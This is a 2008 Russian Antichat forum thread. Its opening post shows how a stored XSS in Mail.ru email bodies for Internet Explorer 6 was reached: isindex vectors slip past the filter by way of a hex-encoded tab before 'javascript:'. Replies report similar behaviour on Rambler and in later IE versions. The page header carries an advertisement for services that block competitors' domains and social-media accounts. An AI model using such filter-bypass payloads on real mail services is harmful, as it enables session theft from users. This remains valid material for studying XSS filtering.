Активная XSS Mail.ru (IE6) / 09.11.08

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активная XSS Mail.ru (IE6) / 09.11.08

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Активная XSS Mail.ru (IE6) / 09.11.08

10.11.2008, 00:04

brain[pillow]

Участник форума

Регистрация: 07.11.2008

Сообщений: 124

С нами: 9214741

Репутация: 386

Активная XSS Mail.ru (IE6) / 09.11.08

Недавно рылся по секьюрити блогам, и нашёл вот такой вот интересный пост с двумя XSS-конструкциями для браузера IE (http://www.thespanner.co.uk/2008/08/26/new-xss-vector/):

Код:

1) <isindex type=image src=1 onerror=alert(1)>

2) <isindex action=javascript:alert(1) type=image>

Первая конструкция работает под все версии IE, но на mail.ru тщательно фильтруется активное содержимое любых тегов, поэтому вариант с onload/onerror я отбросил исходя из прошлого горького опыта.

А вот вторая XSS выглядела немного более многообещающей. Заюзав её в неизменном виде на почте mail.ru я получил вот что:

Код:

<isindex action=xjavascript:alert(1) type=image>

Через 5 минут этот фильтр обошёлся добавлением загнанной в hex табуляции (&#9). Фильтр сделал с этим вариантом следующее:

Код:

<isindex action=&#x9javascript:alert(1) type=image>

А это дело корректно обрабатывается в ослике, поэтому на данный момент мы имеем активную XSS в теле письма для IE 6.0:

Код:

<isindex action=&#9javascript:alert(1) type=image>

Пасиба за внимание, надеюсь, кому-нибудь пригодится

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось brain[pillow]; 10.11.2008 в 00:09..

10.11.2008, 00:16

AdReNa1!Ne

Участник форума

Регистрация: 24.05.2007

Сообщений: 229

С нами: 9982466

Репутация: 309

Ну что ж, молодец) Будем знать)

10.11.2008, 12:25

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

С нами: 10885346

Репутация: 2947

Цитата:

Сообщение от AdReNa1!Ne

Ну что ж, молодец) Будем знать)

Кстать по секрету .. =AdReNa1!Ne работает в mail.ru

10.11.2008, 12:51

Chaak

Познавший АНТИЧАТ

Регистрация: 01.06.2008

Сообщений: 1,047

С нами: 9443906

Репутация: 3313

Цитата:

Сообщение от slider

Кстать по секрету .. =AdReNa1!Ne работает в mail.ru

может ты его спутал с модератором ксакепа?

10.11.2008, 00:28

~~9()K_t()R~~

Banned

Регистрация: 09.11.2008

Сообщений: 4

С нами: 9211348

Репутация: -9

10.11.2008, 00:41

cremator (c)

Постоянный

Регистрация: 20.06.2008

Сообщений: 323

С нами: 9416345

Репутация: 165

Еще и на рамблер есть

10.11.2008, 00:45

Kaimi

Познавший АНТИЧАТ

Регистрация: 23.08.2007

Сообщений: 1,237

С нами: 9851426

Репутация: 1676

У меня только как пассивка срабатывает

10.11.2008, 00:53

NFM

Постоянный

Регистрация: 16.01.2006

Сообщений: 598

С нами: 10692326

Репутация: 531

в ие7 картинка типа и при нажатие алерт срабатывает

10.11.2008, 12:18

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

С нами: 10339586

Репутация: 1396

в 8 Бета - тоже самое что и у Kaimi
x3 что за нах..

#10

10.11.2008, 12:28

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

С нами: 9681386

Репутация: 2145

разведчик=\

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Активная XSS на mail.ru	Dronga	Уязвимости Mail-сервис	69	05.04.2008 01:56
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules